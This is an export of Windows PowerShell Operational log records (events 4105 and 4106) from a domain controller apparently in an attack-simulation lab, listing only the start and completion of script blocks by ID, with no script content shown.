06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477182
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477181
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477180
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477179
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477178
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477177
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477176
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477175
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477174
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477173
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477172
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477171
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477170
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477169
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477168
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477167
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477166
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477165
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477164
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477163
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477162
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477161
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477160
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477159
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477158
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477157
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477156
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477155
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477154
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477153
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477152
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477151
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477150
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477149
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477148
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477147
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477146
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477145
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477144
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477143
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477142
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477141
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477140
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477139
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477138
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477137
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477136
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477135
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477134
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477133
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477132
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477131
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477130
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477129
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477128
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477127
Keywords=None
